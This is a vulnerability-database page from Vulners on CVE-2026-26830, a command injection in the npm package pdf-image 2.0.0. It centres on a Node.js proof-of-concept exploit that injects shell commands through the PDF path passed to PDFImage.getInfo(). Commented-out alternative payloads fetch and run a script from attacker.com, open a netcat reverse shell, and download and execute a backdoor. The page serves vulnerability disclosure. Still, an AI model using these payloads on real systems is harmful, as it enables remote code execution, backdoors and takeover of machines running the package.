Vulners
Lucene search
📄 pdf-image 2.0.0 Command Injection
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for CVE-2026-26830 | 24 Mar 202616:15 | – | githubexploit |
 | CVE-2026-26830 | 25 Mar 202600:00 | – | attackerkb |
 | CVE-2026-26830 | 25 Mar 202617:08 | – | circl |
 | pdf-image 安全漏洞 | 25 Mar 202600:00 | – | cnnvd |
 | CVE-2026-26830 | 25 Mar 202600:00 | – | cve |
 | CVE-2026-26830 | 25 Mar 202600:00 | – | cvelist |
 | EUVD-2026-15457 | 25 Mar 202615:31 | – | euvd |
 | pdf-image has an OS Command Injection Vulnerability through its pdfFilePath parameter | 25 Mar 202615:31 | – | github |
 | CVE-2026-26830 | 25 Mar 202615:16 | – | nvd |
 | GHSA-Q5MH-72XG-628W pdf-image has an OS Command Injection Vulnerability through its pdfFilePath parameter | 25 Mar 202615:31 | – | osv |
10
==================================================================================================================================
| # Title : pdf-image 2.0.0 OS Command Injection via Unescaped PDF Path in PDFImage.getInfo() |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/pdf-image |
==================================================================================================================================
[+] Summary : In pdf-image version 2.0.0, a security issue allows OS command injection when untrusted input is passed to the PDFImage constructor and later processed by methods such as getInfo().
[+] POC :
// exploit.js
const { PDFImage } = require("pdf-image");
const maliciousPdfPath = 'test.pdf"; touch /tmp/pwned.txt; echo "';
// const maliciousPdfPath = 'test.pdf"; curl http://attacker.com/shell.sh | bash; echo "';
// const maliciousPdfPath = 'test.pdf"; nc -e /bin/sh attacker.com 4444; echo "';
// const maliciousPdfPath = 'test.pdf"; wget http://attacker.com/backdoor -O /tmp/backdoor && chmod +x /tmp/backdoor && /tmp/backdoor; echo "';
console.log("[+] CVE-2026-26830 - PDFImage OS Command Injection Exploit");
console.log("[+] Malicious PDF path:", maliciousPdfPath);
console.log("[+] Creating PDFImage instance...");
const pdfImage = new PDFImage(maliciousPdfPath);
console.log("[+] Calling getInfo() to trigger the vulnerability...");
pdfImage.getInfo()
.then((info) => {
console.log("[!] getInfo() succeeded unexpectedly (injection might still have worked)");
console.log("Info:", info);
})
.catch((err) => {
console.log("[!] getInfo() failed (but command may have executed before the error)");
console.log("Error:", err.message);
})
.finally(() => {
console.log("[*] Check if the command executed by running: cat /tmp/pwned.txt");
console.log("[*] If the file exists, the exploit was successful!");
});
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Apr 2026 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.19.8
EPSS0.00292
SSVC